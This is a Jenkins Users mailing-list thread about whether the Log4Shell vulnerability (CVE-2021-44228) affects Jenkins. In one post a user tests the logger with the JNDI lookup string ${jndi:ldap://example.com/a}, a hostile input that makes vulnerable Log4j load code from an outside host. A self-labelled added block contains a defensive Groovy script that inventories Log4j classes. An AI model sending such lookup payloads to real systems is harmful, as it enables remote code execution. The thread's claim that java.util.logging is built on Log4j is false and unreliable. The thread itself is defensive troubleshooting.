[Urgent] CVE-2021-44228 and Jenkins


the.n...@gmail.com

Dec 12, 2021, 10:27:40 AM
to Jenkins Users
Hi All,

I am looking for any information relating to whether the Zero Days CVE has any impact on Jenkins or Plugins. We do know that the java.util.logging is built on log4j, but do not know whether protections are in place to prevent this vulnerability from being exploited, and where. For example, could a command in a pipeline trigger this vulnerability?

This is a somewhat urgent request.

Thanks,
Randall

Krish S

Dec 12, 2021, 11:34:15 AM
to jenkins...@googlegroups.com
I am following for the same issue… found below info on community page regarding this vulnerability. 


Thanks & Regards, 
Kritesh

--
You received this message because you are subscribed to the Google Groups "Jenkins Users" group.
To unsubscribe from this group and stop receiving emails from it, send an email to jenkinsci-use...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/4e157a13-bfba-425a-81ae-b93cdd845f9dn%40googlegroups.com.

the.n...@gmail.com

Dec 12, 2021, 11:39:55 AM
to Jenkins Users
Hi Kritesh,

Thank you for this info.

The problem with that example is that Apache java.util.logging is built on top of Log4j but does not identify as such. I am not convinced that this test is sufficient.

Sincerely,
Randall

the.n...@gmail.com

Dec 12, 2021, 11:44:35 AM
to Jenkins Users
Running the script:
println(java.util.logging.Logger.class)

does indicate that Apache logger (built on top of Log4j) is present in the LTS version of Jenkins.

the.n...@gmail.com

Dec 12, 2021, 12:28:09 PM
to Jenkins Users
The good news is that passing the ${jndi:ldap://example.com/a} string through the logger does not trigger the CVE behaviour.
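The two checks above (resolving java.util.logging.Logger, and passing a lookup string through the logger) do not actually tell you whether Log4j 2 is on the classpath. The following script is an added example, not code from the thread or from the Jenkins project; it is meant to be pasted into Manage Jenkins > Script Console by an administrator. It reports where java.util.logging.Logger is really loaded from, and then asks the Jenkins core classloader and every plugin classloader whether they can see the Log4j 2 classes that CVE-2021-44228 concerns. The Jenkins API calls (Jenkins.get(), PluginManager.uberClassLoader, PluginWrapper.classLoader) and the Log4j 2 class names are real; the output format and the helper name are this example's own.

```groovy
// Added example (not part of the original thread). Run in the Jenkins
// Script Console as an administrator. Read-only inventory: it loads no
// class initialisers and sends nothing through any logger.
import jenkins.model.Jenkins

// 1. Where does java.util.logging.Logger come from? A null code source means
//    the class was loaded by the JDK's bootstrap/platform loader, i.e. it is
//    part of the java.logging module and not something built on Log4j.
def julSource = java.util.logging.Logger.protectionDomain?.codeSource?.location
println "java.util.logging.Logger loaded from: ${julSource ?: 'JDK (bootstrap class loader)'}"

// 2. Probe a classloader for Log4j 2. JndiLookup lives in log4j-core and is
//    the class at the centre of CVE-2021-44228; org.apache.logging.log4j.Logger
//    is only the API jar, whose presence alone does not make Jenkins affected.
def log4jClasses = [
    'org.apache.logging.log4j.core.lookup.JndiLookup',  // log4j-core
    'org.apache.logging.log4j.Logger',                  // log4j-api only
]

def probe = { String owner, ClassLoader cl ->
    log4jClasses.each { String cls ->
        try {
            // initialize=false: locate the class without running static initialisers
            def c = Class.forName(cls, false, cl)
            def loc = c.protectionDomain?.codeSource?.location
            println "${owner}: ${cls} FOUND in ${loc}"
        } catch (ClassNotFoundException ignored) {
            println "${owner}: ${cls} not found"
        }
    }
}

def jenkins = Jenkins.get()

// Jenkins core plus everything core can see
probe('jenkins-core', jenkins.pluginManager.uberClassLoader)

// Each plugin has its own classloader; a hit here means that plugin bundles
// the jar (the location printed tells you which jar).
jenkins.pluginManager.plugins.each { plugin ->
    probe(plugin.shortName, plugin.classLoader)
}
```

Read the output as an inventory, not as a verdict: a "FOUND" line for JndiLookup names a specific jar that ships log4j-core and is the thing to check against the vendor's advisory and upgrade, while a "not found" for JndiLookup everywhere means no classloader visible to Jenkins core or its plugins can reach the vulnerable lookup class. The first line will show that java.util.logging.Logger comes from the JDK itself, which is why the println check in the thread says nothing about Log4j.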

the.n...@gmail.com

Dec 12, 2021, 5:12:46 PM
to Jenkins Users

Baptiste Mathus

Dec 29, 2021, 2:20:17 AM
to jenkins...@googlegroups.com


On Sun, Dec 12, 2021 at 16:27, the.n...@gmail.com <the.n...@gmail.com> wrote:
> Hi All,
>
> I am looking for any information relating to whether the Zero Days CVE has any impact on Jenkins or Plugins. We do know that the java.util.logging is built on log4j,

Where did you read that java.util.logging is built on log4j?

> but do not know whether protections are in place to prevent this vulnerability from being exploited, and where. For example, could a command in a pipeline trigger this vulnerability?
>
> This is a somewhat urgent request.
>
> Thanks,
> Randall